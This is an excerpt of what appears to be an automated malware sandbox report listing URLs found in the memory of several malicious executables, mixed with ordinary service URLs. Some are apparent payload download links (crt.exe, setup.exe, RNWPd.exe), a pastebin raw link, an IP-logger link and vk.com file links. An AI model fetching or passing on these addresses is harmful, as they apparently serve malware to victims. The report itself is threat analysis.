Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/?act=login
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/?act=logout&hash=d4e90dd89b51cf03c1&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeb_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exeh
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1408547715.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com/ssl/crt.exez
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lop.foxesjoy.com:80/ssl/crt.exeBt
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maps.googleapis.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeI
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeU
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com/525403/setup.exeom/a
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeAy
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exeeska
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://monoblocked.com:80/525403/setup.exehudp(
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://orion.ts.360.com/promo/opera?ch=%s&sch=%s&ver=%s&lan=%s&os=%s&mid=%s&mver=%s&time=%I64d/down
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://papi.vk.com/pushsse/ruim
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV3
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmp, lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2511302805.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://platform.twitter.com
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r.mradx.net
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com
Source: lgX7lgUL1w.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/base.3a6f1d6d.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/common.e499224c.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_cnt_async.4881739c.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/al/vkui.c63ec9ec.css
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-20.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.vk.me
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stats.vk-portal.net
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sun6-20.userapi.com/c909228/u5294803/docs/d35/91095a9a6f06/gewgdggrwh_20240521161330.bmp?ext
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.1389103968.000002B17165D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/browser_reports?dest=default_reports
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZFK5
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzKL04
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TPX72
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXn
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfe
